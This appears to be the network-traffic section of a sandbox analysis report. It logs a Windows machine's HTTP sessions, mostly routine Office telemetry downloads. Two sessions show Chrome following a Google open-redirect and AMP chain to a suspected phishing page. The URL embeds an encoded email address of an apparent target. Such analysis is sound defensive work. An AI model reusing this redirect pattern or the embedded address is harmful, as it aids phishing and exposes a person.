                      X-CID: 2
                      X-CCC: GB
                      Cache-Control: public, max-age=162361
                      Date: Tue, 03 Dec 2024 16:51:27 GMT
                      Connection: close
                      X-CID: 2


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      6192.168.2.649722142.251.37.1954436472C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:28 UTC945OUTGET /url?q=lbjaqJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2fhandlingservice.com.br%2fyoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%E3%80%82$$$%E3%80%82 HTTP/1.1
                      Host: google.dz
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlaHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-User: ?1
                      Sec-Fetch-Dest: document
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-12-03 16:51:28 UTC814INHTTP/1.1 301 Moved Permanently
                      Location: https://www.google.dz/url?q=lbjaqJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2Fhandlingservice.com.br%2Fyoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%E3%80%82$$$%E3%80%82
                      Content-Type: text/html; charset=UTF-8
                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-TvZA9o2MY4_TqMUsJZAIpA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                      Permissions-Policy: unload=()
                      Date: Tue, 03 Dec 2024 16:51:28 GMT
                      Expires: Thu, 02 Jan 2025 16:51:28 GMT
                      Cache-Control: public, max-age=2592000
                      Server: gws
                      Content-Length: 399
                      X-XSS-Protection: 0
                      X-Frame-Options: SAMEORIGIN
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Connection: close
                      2024-12-03 16:51:28 UTC399INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 64 7a 2f 75 72 6c 3f 71 3d 6c 62 6a 61 71 4a 4c 69 36 7a 33 79 68 26 61 6d 70 3b 72 63 74 3d 74 54 50 76 76 71 36 78 52 79 6a 37 59 30 30 78 44 6a 6e 6c 78 39 6b 49 6a 75 73 75 63 54 26 61 6d 70 3b 73 61
                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.dz/url?q=lbjaqJLi6z3yh&amp;rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&amp;sa


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      7192.168.2.64972423.218.208.109443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:29 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      Accept-Encoding: identity
                      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                      Range: bytes=0-2147483646
                      User-Agent: Microsoft BITS/7.8
                      Host: fs.microsoft.com
                      2024-12-03 16:51:29 UTC534INHTTP/1.1 200 OK
                      Content-Type: application/octet-stream
                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                      ApiVersion: Distribute 1.1
                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                      X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                      Cache-Control: public, max-age=69235
                      Date: Tue, 03 Dec 2024 16:51:29 GMT
                      Content-Length: 55
                      Connection: close
                      X-CID: 2
                      2024-12-03 16:51:29 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                      Session IDSource IPSource PortDestination IPDestination Port
                      8192.168.2.64972513.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:30 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:31 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:30 GMT
                      Content-Type: text/xml
                      Content-Length: 3788
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                      ETag: "0x8DC582BAC2126A6"
                      x-ms-request-id: 481e6931-101e-0034-7113-4596ff000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165130Z-174f7845968kvnqxhC1EWRmf3g0000000sy000000000rez2
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:31 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                      Session IDSource IPSource PortDestination IPDestination Port
                      9192.168.2.64972613.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:30 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:31 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:30 GMT
                      Content-Type: text/xml
                      Content-Length: 450
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                      ETag: "0x8DC582BD4C869AE"
                      x-ms-request-id: cb4c2579-a01e-0032-3af9-441949000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165130Z-174f7845968frfdmhC1EWRxxbw00000016b0000000002x1u
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:31 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                      Session IDSource IPSource PortDestination IPDestination Port
                      10192.168.2.64972813.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:30 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:31 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:30 GMT
                      Content-Type: text/xml
                      Content-Length: 2160
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                      ETag: "0x8DC582BA3B95D81"
                      x-ms-request-id: d2130280-a01e-006f-03c7-4313cd000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165130Z-174f7845968qj8jrhC1EWRh41s000000161000000000xtyc
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:31 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      11192.168.2.64972713.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:30 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:31 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:30 GMT
                      Content-Type: text/xml
                      Content-Length: 2980
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                      ETag: "0x8DC582BA80D96A1"
                      x-ms-request-id: cbbdc96a-401e-00ac-56f2-440a97000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165130Z-174f7845968cs2nkhC1EWR2tq000000001vg00000000h32v
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:31 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                      Session IDSource IPSource PortDestination IPDestination Port
                      12192.168.2.64972913.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:30 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:31 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:30 GMT
                      Content-Type: text/xml
                      Content-Length: 408
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                      ETag: "0x8DC582BB56D3AFB"
                      x-ms-request-id: 44a2812f-d01e-0028-1207-427896000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165130Z-174f7845968swgbqhC1EWRmnb400000016b000000000fymu
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:31 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      13192.168.2.649730172.217.171.1954436472C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:30 UTC949OUTGET /url?q=lbjaqJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2Fhandlingservice.com.br%2Fyoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%E3%80%82$$$%E3%80%82 HTTP/1.1
                      Host: www.google.dz
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlaHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-User: ?1
                      Sec-Fetch-Dest: document
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-12-03 16:51:31 UTC1080INHTTP/1.1 302 Found
                      Location: https://www.google.dz/amp/s/handlingservice.com.br/yoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%E3%80%82$$$%E3%80%82
                      Cache-Control: private
                      Content-Type: text/html; charset=UTF-8
                      Strict-Transport-Security: max-age=31536000
                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-1nIcbqmiDJC5mmgKk0zP8A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                      Permissions-Policy: unload=()
                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                      Date: Tue, 03 Dec 2024 16:51:31 GMT
                      Server: gws
                      Content-Length: 319
                      X-XSS-Protection: 0
                      Set-Cookie: NID=519=QwvK-YsQkeGDsv9h92JL7g8Bxmi17LYPohkXyYCSaih1wDYjcODLjewFr-Qf2lPg2LPHbJZ179qVuKrRKPYeQH1KvbHcKTdvKNNcNCDcRfXJhI7Ur7aZyoIlbAzJ8qNaxI1CDcV3Ph_ak9v0D_aQ8FBEIxtu3Dy6Jg9Xf8C198LYVZF0Moqqcz8FadBGB2ot5WUS; expires=Wed, 04-Jun-2025 16:51:31 GMT; path=/; domain=.google.dz; Secure; HttpOnly; SameSite=none
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Connection: close
                      2024-12-03 16:51:31 UTC310INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 64 7a 2f 61 6d 70 2f 73 2f 68 61 6e 64 6c 69 6e 67 73 65 72 76 69 63 65 2e 63 6f 6d 2e 62 72 2f 79 6f 79 61 2f 73 69 74 67 2f 59 57 31 35 4c 6d 64 70 62 48 42 70 62 6b 42 6a 61 47 56 79 62 32 74 6c 5a 57
                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.dz/amp/s/handlingservice.com.br/yoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZW
                      2024-12-03 16:51:31 UTC9INData Raw: 3c 2f 48 54 4d 4c 3e 0d 0a
                      Data Ascii: </HTML>


                      Session IDSource IPSource PortDestination IPDestination Port
                      14192.168.2.64973113.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:32 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:33 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:33 GMT
                      Content-Type: text/xml
                      Content-Length: 474
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                      ETag: "0x8DC582B9964B277"
                      x-ms-request-id: 03f3685a-b01e-0097-2663-444f33000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165133Z-174f784596886s2bhC1EWR743w000000168g00000000b87t
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:33 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      15192.168.2.64973313.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:32 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:33 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:33 GMT
                      Content-Type: text/xml
                      Content-Length: 471
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                      ETag: "0x8DC582BB10C598B"
                      x-ms-request-id: f4f389a9-e01e-0020-2c00-42de90000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165133Z-174f784596886s2bhC1EWR743w00000016a0000000005dxe
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:33 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      16192.168.2.64973513.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:32 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:33 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:33 GMT
                      Content-Type: text/xml
                      Content-Length: 467
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                      ETag: "0x8DC582BA6C038BC"
                      x-ms-request-id: 8361aa46-901e-008f-73ef-4467a6000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165133Z-174f7845968glpgnhC1EWR7uec00000016dg0000000060s6
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
